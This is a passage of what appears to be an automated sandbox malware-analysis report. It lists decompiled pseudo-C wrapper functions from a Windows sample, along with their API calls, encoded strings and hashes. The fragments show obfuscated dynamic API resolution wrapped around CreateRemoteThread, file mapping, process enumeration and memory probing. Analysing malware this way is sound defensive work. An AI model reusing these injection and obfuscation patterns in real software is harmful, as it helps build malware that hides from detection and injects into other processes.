                                                          				return E00404500( &_v12);
                                                          			}

                                                          0x0045cb12
                                                          0x0045cb15
                                                          0x0045cb18
                                                          0x0045cb1a
                                                          0x0045cb27
                                                          0x0045cb32
                                                          0x0045cb46
                                                          0x0045cb62
                                                          0x0045cb68
                                                          0x0045cb6b
                                                          0x0045cb6e
                                                          0x0045cb7b

                                                          APIs
                                                          • CreateRemoteThread.KERNELBASE(0A74C085,00000000,?,?,?,?,?,?,0043B3C0,0A74C085), ref: 0045CB62
                                                          Strings
                                                          • 7bn6x5Z6jaWX+bZ6W0DlpHNu, xrefs: 0045CB2D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateRemoteThread
                                                          • String ID: 7bn6x5Z6jaWX+bZ6W0DlpHNu
                                                          • API String ID: 4286614544-3393271841
                                                          • Opcode ID: 9dd976c75394f38078006362e8e1e35470d6d281ef003629406f35a042f9415a
                                                          • Instruction ID: 0b73c443149c3b52f054c5c2eb42313dac5cdfa5de45c38fbae08b498ba9eb4f
                                                          • Opcode Fuzzy Hash: 9dd976c75394f38078006362e8e1e35470d6d281ef003629406f35a042f9415a
                                                          • Instruction Fuzzy Hash: 3F0121B5600608BFC710DFA9DC81C9FBBBDEBCD710B518579B918D3251E674AD008AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E0045BE58(CHAR* __eax, void* __ebx, long __ecx, long __edx, void* __esi, void* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t37;
                                                          				long _t39;
                                                          				void* _t40;
                                                          				void* _t42;
                                                          
                                                          				_v12 = 0;
                                                          				_v8 = __ecx;
                                                          				_t39 = __edx;
                                                          				_t25 = __eax;
                                                          				 *[fs:eax] = _t42 + 0xfffffff8;
                                                          				L00455C58("7bn6x5Z6Za6opji",  &_v12);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45becc, _t42, __esi, __ebx, _t40);
                                                          				CreateFileA(_t25, _t39, _v8, _a16, _a12, _a8, _a4); // executed
                                                          				_pop(_t37);
                                                          				 *[fs:eax] = _t37;
                                                          				_push(0x45bed3);
                                                          				return E00404500( &_v12);
                                                          			}

                                                          0x0045be62
                                                          0x0045be65
                                                          0x0045be68
                                                          0x0045be6a
                                                          0x0045be77
                                                          0x0045be82
                                                          0x0045be96
                                                          0x0045beb2
                                                          0x0045beb8
                                                          0x0045bebb
                                                          0x0045bebe
                                                          0x0045becb

                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000000,?,?,?,?,?,?,?), ref: 0045BEB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: 7bn6x5Z6Za6opji
                                                          • API String ID: 823142352-2055617166
                                                          • Opcode ID: a8c5a6bacb14361f408869c79cb8e8f9a7da43167d264fe132cf4b6c52064880
                                                          • Instruction ID: 9dfec613dcd4ad1ce01370a7b6527e25b2a137a6dbc302fe48281c6108339ee1
                                                          • Opcode Fuzzy Hash: a8c5a6bacb14361f408869c79cb8e8f9a7da43167d264fe132cf4b6c52064880
                                                          • Instruction Fuzzy Hash: A20121B5600608BF8710DFA9DC81C9BBBBDEFCD710B518579BA18D3251E7749D008AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 61%
                                                          			E0045C584(intOrPtr __eax, void* __ebx) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				signed char _t22;
                                                          				intOrPtr _t34;
                                                          				void* _t36;
                                                          				void* _t38;
                                                          
                                                          				_v12 = 0;
                                                          				_v8 = __eax;
                                                          				E004049CC(_v8);
                                                          				 *[fs:eax] = _t38 + 0xfffffff8;
                                                          				L00455C58("ZqWeZa6opjNeFPnvxEWep58Y",  &_v12);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c602, _t38, __ebx, _t36);
                                                          				_t22 = GetFileAttributesA(E004049DC(_v8)); // executed
                                                          				if(_t22 == 0xffffffff || (_t22 & 0x00000010) == 0) {
                                                          				}
                                                          				_pop(_t34);
                                                          				 *[fs:eax] = _t34;
                                                          				_push(E0045C609);
                                                          				return E00404524( &_v12, 2);
                                                          			}

                                                          0x0045c58d
                                                          0x0045c590
                                                          0x0045c596
                                                          0x0045c5a6
                                                          0x0045c5b1
                                                          0x0045c5c5
                                                          0x0045c5d6
                                                          0x0045c5db
                                                          0x0045c5db
                                                          0x0045c5e9
                                                          0x0045c5ec
                                                          0x0045c5ef
                                                          0x0045c601

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000,?,?), ref: 0045C5D6
                                                          Strings
                                                          • ZqWeZa6opjNeFPnvxEWep58Y, xrefs: 0045C5AC
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID: ZqWeZa6opjNeFPnvxEWep58Y
                                                          • API String ID: 3188754299-2668179521
                                                          • Opcode ID: 0d770fc5c2ad62fadf51dfbf5e437209ca7d868002b8a2e18e370dfca16c24bc
                                                          • Instruction ID: 36b71e0d0722648a5017349291098b20cf503f95275dc929e2820dfd37fa5c3b
                                                          • Opcode Fuzzy Hash: 0d770fc5c2ad62fadf51dfbf5e437209ca7d868002b8a2e18e370dfca16c24bc
                                                          • Instruction Fuzzy Hash: 9601A7B0604308AFCB10EBF9CC9295EB7A8DB89315B504576F908F3692E6386E04C658
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E0045A8C4(void* __eax, void* __ebx, long __ecx, long __edx, void* __edi, void* __esi, long _a4, long _a8) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _t21;
                                                          				intOrPtr _t33;
                                                          				long _t35;
                                                          				void* _t37;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = __ecx;
                                                          				_t35 = __edx;
                                                          				_t37 = __eax;
                                                          				 *[fs:eax] = _t40 + 0xfffffff4;
                                                          				L00455C58("cHNUWa66FeSaZa6op7",  &_v16);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v16),  *[fs:eax], 0x45a934, _t40, __edi, __esi, __ebx, _t38);
                                                          				_t21 = MapViewOfFile(_t37, _t35, _v8, _a8, _a4); // executed
                                                          				_v12 = _t21;
                                                          				_pop(_t33);
                                                          				 *[fs:eax] = _t33;
                                                          				_push(0x45a93b);
                                                          				return E00404500( &_v16);
                                                          			}

                                                          0x0045a8cf
                                                          0x0045a8d2
                                                          0x0045a8d5
                                                          0x0045a8d7
                                                          0x0045a8e4
                                                          0x0045a8ef
                                                          0x0045a903
                                                          0x0045a919
                                                          0x0045a91b
                                                          0x0045a920
                                                          0x0045a923
                                                          0x0045a926
                                                          0x0045a933

                                                          APIs
                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000003,00000080,?,00000000,00000000,00000000), ref: 0045A919
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID: cHNUWa66FeSaZa6op7
                                                          • API String ID: 3314676101-3015465037
                                                          • Opcode ID: 1e16f216c28589431112a383692f0ec3bbbd8aafbd305038ceb900ce17f4e020
                                                          • Instruction ID: 34e40cec5de58d34fb12529f140ec416bcdb10fae9c1e1a080311a28c4f2b234
                                                          • Opcode Fuzzy Hash: 1e16f216c28589431112a383692f0ec3bbbd8aafbd305038ceb900ce17f4e020
                                                          • Instruction Fuzzy Hash: B10162B5900208BF8710DFAADC81C9EBBFCEB8D7147518576F918D3251D6749E108B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E0045C8BC(void* __eax, void* __ebx, long __ecx, void* __edx, void* __esi, struct _OVERLAPPED* _a4, DWORD* _a8) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _t23;
                                                          				intOrPtr _t33;
                                                          				void* _t35;
                                                          				void* _t36;
                                                          				void* _t38;
                                                          
                                                          				_v12 = 0;
                                                          				_v8 = __ecx;
                                                          				_t35 = __edx;
                                                          				_t23 = __eax;
                                                          				 *[fs:eax] = _t38 + 0xfffffff8;
                                                          				L00455C58("WbnvF0W0=HK6",  &_v12);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c928, _t38, __esi, __ebx, _t36);
                                                          				WriteFile(_t23, _t35, _v8, _a8, _a4); // executed
                                                          				_pop(_t33);
                                                          				 *[fs:eax] = _t33;
                                                          				_push(E0045C92F);
                                                          				return E00404500( &_v12);
                                                          			}

                                                          0x0045c8c6
                                                          0x0045c8c9
                                                          0x0045c8cc
                                                          0x0045c8ce
                                                          0x0045c8db
                                                          0x0045c8e6
                                                          0x0045c8fa
                                                          0x0045c90e
                                                          0x0045c914
                                                          0x0045c917
                                                          0x0045c91a
                                                          0x0045c927

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,?,00000000,?,?,?,00000000,00000000), ref: 0045C90E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID: WbnvF0W0=HK6
                                                          • API String ID: 3934441357-551404843
                                                          • Opcode ID: 4a8c0f779c5717f1d83c4ba89df535235c10ec742024155374879a9d00876a7c
                                                          • Instruction ID: ff42bfb428e40931a330ed2f96ba2833be91d5993588f6a0dc2a4f825be25e6c
                                                          • Opcode Fuzzy Hash: 4a8c0f779c5717f1d83c4ba89df535235c10ec742024155374879a9d00876a7c
                                                          • Instruction Fuzzy Hash: 090131B5604708BFC710DFE9DC81C9FBBBCEB8D710B51857AB918D3251E6749E048AA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E0045C954(void* __eax, void* __ebx, long __ecx, void* __edx, void* __esi, struct _OVERLAPPED* _a4, DWORD* _a8) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _t23;
                                                          				intOrPtr _t33;
                                                          				void* _t35;
                                                          				void* _t36;
                                                          				void* _t38;
                                                          
                                                          				_v12 = 0;
                                                          				_v8 = __ecx;
                                                          				_t35 = __edx;
                                                          				_t23 = __eax;
                                                          				 *[fs:eax] = _t38 + 0xfffffff8;
                                                          				L00455C58("jaWDpipv+0j",  &_v12);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c9c0, _t38, __esi, __ebx, _t36);
                                                          				ReadFile(_t23, _t35, _v8, _a8, _a4); // executed
                                                          				_pop(_t33);
                                                          				 *[fs:eax] = _t33;
                                                          				_push(E0045C9C7);
                                                          				return E00404500( &_v12);
                                                          			}

                                                          0x0045c95e
                                                          0x0045c961
                                                          0x0045c964
                                                          0x0045c966
                                                          0x0045c973
                                                          0x0045c97e
                                                          0x0045c992
                                                          0x0045c9a6
                                                          0x0045c9ac
                                                          0x0045c9af
                                                          0x0045c9b2
                                                          0x0045c9bf

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,?,?,?,?,?,?,00000000), ref: 0045C9A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: jaWDpipv+0j
                                                          • API String ID: 2738559852-1846638132
                                                          • Opcode ID: 43d934d9aaf6d74a8968c1d532ba32f02dde4872e49aae3dd77f572958499367
                                                          • Instruction ID: 317acb2a43497871ac41f47ea22c227b77e0205c8cace9b359201ce58d7b2823
                                                          • Opcode Fuzzy Hash: 43d934d9aaf6d74a8968c1d532ba32f02dde4872e49aae3dd77f572958499367
                                                          • Instruction Fuzzy Hash: 820162B5600708BF8710DFA5DC8189EBBBCEB8D710B51817AB908E3251D6745E008AA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E0045B2E0(CHAR* __eax, void* __ebx, CHAR* __edx, void* __esi) {
                                                          				char _v8;
                                                          				CHAR* _t17;
                                                          				intOrPtr _t23;
                                                          				CHAR* _t25;
                                                          				void* _t26;
                                                          				intOrPtr _t28;
                                                          
                                                          				_t25 = __edx;
                                                          				_t17 = __eax;
                                                          				 *[fs:eax] = _t28;
                                                          				L00455C58("Za6gpNFv+aZVFei",  &_v8);
                                                          				 *0x470f9c( *0x470fa0, E004049DC(_v8),  *[fs:eax], 0x45b337, _t28, __esi, __ebx, 0, _t26);
                                                          				FindWindowA(_t17, _t25); // executed
                                                          				_pop(_t23);
                                                          				 *[fs:eax] = _t23;
                                                          				_push(0x45b33e);
                                                          				return E00404500( &_v8);
                                                          			}

                                                          0x0045b2e7
                                                          0x0045b2e9
                                                          0x0045b2f6
                                                          0x0045b301
                                                          0x0045b315
                                                          0x0045b31d
                                                          0x0045b323
                                                          0x0045b326
                                                          0x0045b329
                                                          0x0045b336

                                                          APIs
                                                          • FindWindowA.USER32(00000000,00000000,?,?,00000000,00000000,?,00444C1F,00000000,00444CA2,?,00000000,00000000,00000000,00000000,00000000), ref: 0045B31D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FindWindow
                                                          • String ID: Za6gpNFv+aZVFei
                                                          • API String ID: 134000473-2802009458
                                                          • Opcode ID: 8f42f971a6e24e0ca626ebe53a2c25d9ce4ddc75e48e4f53d82eca1f11e18835
                                                          • Instruction ID: f93d92c4e1972b19d936cb926f0bf2e70785caae9c2f6df26c81e8556f2e0dd0
                                                          • Opcode Fuzzy Hash: 8f42f971a6e24e0ca626ebe53a2c25d9ce4ddc75e48e4f53d82eca1f11e18835
                                                          • Instruction Fuzzy Hash: BBF08271200308BFD711EBA5DC52E5A77ECDB89700B914472F908E3652D7785D04C6A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E0045ACDC(void* __eax, void* __ebx, DWORD* __edx, void* __esi) {
                                                          				char _v8;
                                                          				void* _t17;
                                                          				intOrPtr _t23;
                                                          				DWORD* _t25;
                                                          				void* _t26;
                                                          				intOrPtr _t28;
                                                          
                                                          				_t25 = __edx;
                                                          				_t17 = __eax;
                                                          				 *[fs:eax] = _t28;
                                                          				L00455C58("ZqWeZ5DvFi8Vp0Wj=Pn6xH7",  &_v8);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45ad33, _t28, __esi, __ebx, 0, _t26);
                                                          				GetExitCodeThread(_t17, _t25); // executed
                                                          				_pop(_t23);
                                                          				 *[fs:eax] = _t23;
                                                          				_push(E0045AD3A);
                                                          				return E00404500( &_v8);
                                                           			}

                                                          APIs
                                                          • GetExitCodeThread.KERNELBASE(00000000,00000014,?,?,00000000,00000000,?,0043B498,00000000,00000014), ref: 0045AD19
                                                          Strings
                                                          • ZqWeZ5DvFi8Vp0Wj=Pn6xH7, xrefs: 0045ACF8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CodeExitThread
                                                          • String ID: ZqWeZ5DvFi8Vp0Wj=Pn6xH7
                                                          • API String ID: 2886910748-3394517499
                                                          • Opcode ID: 1c8c38b730cb1421216377cf90d2dc43379d84edcd132e6115eaa43bf3057dce
                                                          • Instruction ID: 09357c9e876af73cd3ce9e287685aba195ef0089c119b7784a02ec3ecbf7faa7
                                                          • Opcode Fuzzy Hash: 1c8c38b730cb1421216377cf90d2dc43379d84edcd132e6115eaa43bf3057dce
                                                          • Instruction Fuzzy Hash: E6F02771200304BFC310FBA5EC42E4A77FCDB8D7017514472F908D3652D6BC5E148668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E0045CDE8(void* __eax, void* __ebx, struct _WIN32_FIND_DATAA* __edx, void* __esi) {
                                                          				char _v8;
                                                          				void* _t17;
                                                          				intOrPtr _t23;
                                                          				struct _WIN32_FIND_DATAA* _t25;
                                                          				void* _t26;
                                                          				intOrPtr _t28;
                                                          
                                                          				_t25 = __edx;
                                                          				_t17 = __eax;
                                                          				 *[fs:eax] = _t28;
                                                          				L00455C58("Za6gpir6dPZ0=HK677",  &_v8);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45ce3f, _t28, __esi, __ebx, 0, _t26);
                                                          				FindNextFileA(_t17, _t25); // executed
                                                          				_pop(_t23);
                                                          				 *[fs:eax] = _t23;
                                                          				_push(E0045CE46);
                                                          				return E00404500( &_v8);
                                                           			}

                                                          APIs
                                                          • FindNextFileA.KERNELBASE(?,?,?,?,?,00000000,?,0045D00A,00000000,004542A4,00000000,004542C1,?,00000000,004542D2), ref: 0045CE25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID: Za6gpir6dPZ0=HK677
                                                          • API String ID: 2029273394-1461176880
                                                          • Opcode ID: ecda59d43cc8ab3f56adaf209d876e88e3d500ea6742a92cc575044110539022
                                                          • Instruction ID: 7941cc247345e2b3c43151014393218a1d1a67d2f98d7eb6e3d79a8be84706c1
                                                          • Opcode Fuzzy Hash: ecda59d43cc8ab3f56adaf209d876e88e3d500ea6742a92cc575044110539022
                                                          • Instruction Fuzzy Hash: FFF0A771200304BFD711EBA9DC92E5A77ECDB8DB007514472F908D3652D6B86D0486A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E00450E88(struct _MEMORYSTATUSEX* __eax, void* __ebx) {
                                                          				char _v8;
                                                          				struct _MEMORYSTATUSEX* _t19;
                                                          				intOrPtr _t24;
                                                          				void* _t25;
                                                          				intOrPtr _t27;
                                                          
                                                          				_t19 = __eax;
                                                          				 *[fs:eax] = _t27;
                                                          				L00455C58("ZqKVxaNocHWX+bnrjbZDFPWmZ51",  &_v8);
                                                          				 *((intOrPtr*)( *((intOrPtr*)( *0x46ee50))))( *((intOrPtr*)( *0x46eef8)), E004049DC(_v8),  *[fs:eax], 0x450ee0, _t27, __ebx, 0, _t25);
                                                          				GlobalMemoryStatusEx(_t19); // executed
                                                          				_pop(_t24);
                                                          				 *[fs:eax] = _t24;
                                                          				_push(E00450EE7);
                                                          				return E00404500( &_v8);
                                                           			}

                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,00000000,?,00450F33), ref: 00450EC6
                                                          Strings
                                                          • ZqKVxaNocHWX+bnrjbZDFPWmZ51, xrefs: 00450EA1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: ZqKVxaNocHWX+bnrjbZDFPWmZ51
                                                          • API String ID: 1890195054-4154276380
                                                          • Opcode ID: eb6df32c256fa5173c4180af338f035f3f50cbcb64eb86d7726c16e45bb46104
                                                          • Instruction ID: 585057ed5a55f7e15db7790acfe1761836d21971f10d6cbcedc7dd56703ea3a1
                                                          • Opcode Fuzzy Hash: eb6df32c256fa5173c4180af338f035f3f50cbcb64eb86d7726c16e45bb46104
                                                          • Instruction Fuzzy Hash: 4EF08279300304AFD301EBAADC92E1A73ECE78D700BA10872F904D3652E6B9AE048618
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E0045BD44(void* __eax, void* __ebx) {
                                                          				char _v8;
                                                          				void* _t17;
                                                          				intOrPtr _t22;
                                                          				void* _t23;
                                                          				intOrPtr _t25;
                                                          
                                                          				_t17 = __eax;
                                                          				 *[fs:eax] = _t25;
                                                          				L00455C58("jaWE7qKVhqWRp5u",  &_v8);
                                                          				 *0x470f9c( *0x470fa8, E004049DC(_v8),  *[fs:eax], 0x45bd97, _t25, __ebx, 0, _t23);
                                                          				RegCloseKey(_t17); // executed
                                                          				_pop(_t22);
                                                          				 *[fs:eax] = _t22;
                                                          				_push(0x45bd9e);
                                                          				return E00404500( &_v8);
                                                           			}

                                                          APIs
                                                          • RegCloseKey.KERNELBASE(?,?,?,00000000,?,004551F8,?,00020119,00000000,00455202,?,00000000,00455227), ref: 0045BD7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: jaWE7qKVhqWRp5u
                                                          • API String ID: 3535843008-2917291111
                                                          • Opcode ID: 696099acadcfa8eec699bb912f3cdce7baf85865ff9fcd174422d0eb0d142104
                                                          • Instruction ID: 35908777c7d7221c23bee131b6d42e73951d3790cc5edca30e10c4d6d3ff690d
                                                          • Opcode Fuzzy Hash: 696099acadcfa8eec699bb912f3cdce7baf85865ff9fcd174422d0eb0d142104
                                                          • Instruction Fuzzy Hash: F2F030B1204708BFD711EFA5DC52A5A77FCE789700BA14472FA08D3692D7B85E088668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E0045AFA4(void* __eax, void* __ebx) {
                                                          				char _v8;
                                                          				void* _t17;
                                                          				intOrPtr _t22;
                                                          				void* _t23;
                                                          				intOrPtr _t25;
                                                          
                                                          				_t17 = __eax;
                                                          				 *[fs:eax] = _t25;
                                                          				L00455C58("7qKVhqWCxHru+0j",  &_v8);
                                                          				 *0x470f9c( *0x470fa4, E004049DC(_v8),  *[fs:eax], 0x45aff7, _t25, __ebx, 0, _t23);
                                                          				FindCloseChangeNotification(_t17); // executed
                                                          				_pop(_t22);
                                                          				 *[fs:eax] = _t22;
                                                          				_push(E0045AFFE);
                                                          				return E00404500( &_v8);
                                                           			}

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,00000000,?,0045BF49,00000000,00000000,00000003,00000000,00000000,0045BF5F,?,?), ref: 0045AFDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID: 7qKVhqWCxHru+0j
                                                          • API String ID: 2591292051-2582428777
                                                          • Opcode ID: 5f2c1356b070c8aacb78452e960a7298b20d821df9cb130fd0297a7258da2c03
                                                          • Instruction ID: f0b18c6ebe530d154fada0833a763605c112e49c18201790adf74822f65cd892
                                                          • Opcode Fuzzy Hash: 5f2c1356b070c8aacb78452e960a7298b20d821df9cb130fd0297a7258da2c03
                                                          • Instruction Fuzzy Hash: 5BF0A7B1204304AFC711EFA5DC52A1AB7ECD78D700B914472F904D3542D6785D148658
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E004286D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				char _v16;
                                                          				intOrPtr _v40;
                                                          				void _v44;
                                                          				void* _t36;
                                                          				void* _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t71;
                                                          
                                                          				_t54 = __edx;
                                                          				_v12 = 0;
                                                          				_v16 = 0;
                                                          				memcpy( &_v44, __eax, 7 << 2);
                                                          				_t65 = _t54;
                                                          				_push(_t71);
                                                          				_push(0x4287ae);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t71 + 0xffffffffffffffe4;
                                                          				E00404500(_t54);
                                                          				if(E004282D0(_v44 & 0x0000ffff) != 0) {
                                                          					E00404B0C( &_v12, 0x401);
                                                          					E00404B0C( &_v16, 0x20);
                                                          					_t36 =  *0x46afb4( &_v44, E004280E4( &_v44), E004049DC(_v12), 0x401, E004049DC(_v16), 0x20, 0xa); // executed
                                                          					if(_t36 == 0) {
                                                          						E004046F8(_t65, E004049DC(_v12));
                                                          					}
                                                          				} else {
                                                          					_v8 =  *0x46af7c(_v40);
                                                          					if(_v8 != 0) {
                                                          						E004046F8(_t65, _v8);
                                                          					}
                                                          				}
                                                          				_pop(_t57);
                                                          				 *[fs:eax] = _t57;
                                                          				_push(E004287B5);
                                                          				return E00404524( &_v16, 2);
                                                           			}

                                                          APIs
                                                          • inet_ntoa.WS2_32(?), ref: 0042871C
                                                          • getnameinfo.WS2_32(?,00000000,00000000,00000401,00000000,00000020,0000000A), ref: 00428778
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: getnameinfoinet_ntoa
                                                          • String ID:
                                                          • API String ID: 57870123-0
                                                          • Opcode ID: 8dabe731761d21704c26b085a6a7438e23fc4f56c9dac8f611395db76d809dd6
                                                          • Instruction ID: f5bb0472084a248bae5ac8e42a6c9c91c313b12758310020b3d47fe81e911e79
                                                          • Opcode Fuzzy Hash: 8dabe731761d21704c26b085a6a7438e23fc4f56c9dac8f611395db76d809dd6
                                                          • Instruction Fuzzy Hash: 942198B1B00118ABCB04EBA5DC4169FBBB9EB88314F50447BF900F3291DB7C9D01C659
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00432F84(void* __eax, struct tagPROCESSENTRY32W __edx) {
                                                          				int _t4;
                                                          				void* _t5;
                                                          
                                                          				_t5 = __eax;
                                                          				if(E00432CE8(__eax) == 0) {
                                                          					return 0;
                                                          				} else {
                                                          					_t4 = Process32First(_t5, __edx); // executed
                                                          					return _t4;
                                                          				}
                                                           			}

                                                          APIs
                                                          • Process32First.KERNEL32(?,00000128,?,?,00453983), ref: 00432F95
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: FirstProcess32
                                                          • String ID:
                                                          • API String ID: 2623510744-0
                                                          • Opcode ID: aececb1c3af206cc55317ab1b9b7d8fc0414ca03778ec0ca5e41acb90fb913f1
                                                          • Instruction ID: 20b995b1d37ce201493aa7a1cfadbeca79977a702a32b96be4c991261812a7db
                                                          • Opcode Fuzzy Hash: aececb1c3af206cc55317ab1b9b7d8fc0414ca03778ec0ca5e41acb90fb913f1
                                                          • Instruction Fuzzy Hash: 7CC08CB32023305B8A1066F93E888C7B78DDE4D1BBB0424B3F50CE3212D2A98C00A2E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00432FA4(void* __eax, struct tagPROCESSENTRY32W __edx) {
                                                          				int _t4;
                                                          				void* _t5;
                                                          
                                                          				_t5 = __eax;
                                                          				if(E00432CE8(__eax) == 0) {
                                                          					return 0;
                                                          				} else {
                                                          					_t4 = Process32Next(_t5, __edx); // executed
                                                          					return _t4;
                                                          				}
                                                           			}

                                                          APIs
                                                          • Process32Next.KERNEL32(?,00000128,?,?,004539C8), ref: 00432FB5
                                                          Memory Dump Source
